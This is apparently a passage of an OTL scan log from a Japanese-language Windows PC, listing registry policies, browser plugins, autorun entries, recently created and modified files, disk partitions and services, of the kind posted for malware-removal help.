O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = "F:\install.exe"
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/21 22:18:46 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/04/21 20:06:50 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Old Firefox Data
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/22 23:54:11 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/22 23:52:08 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/22 23:52:05 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/22 23:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/22 23:42:14 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/22 23:42:12 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/22 22:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/22 22:53:41 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/22 00:26:27 | 000,058,581 | ---- | M] () -- C:\Users\ryota\Desktop\BmJbrLdtf0pZaED1429629961_1429629979.jpg
[2015/04/21 22:18:53 | 000,000,098 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\etc\Hosts
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/22 00:26:26 | 000,058,581 | ---- | C] () -- C:\Users\ryota\Desktop\BmJbrLdtf0pZaED1429629961_1429629979.jpg
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Ｋａｌｅｉｄｏｓｃｏｐｅ（ｔｒａｎｓｐａｒｅｎｔ　ｍｉｘ｜Ｂｏｎｕｓ　Ｔｒａｃｋ）.mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/22 23:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/22 23:42:12 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/22 22:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
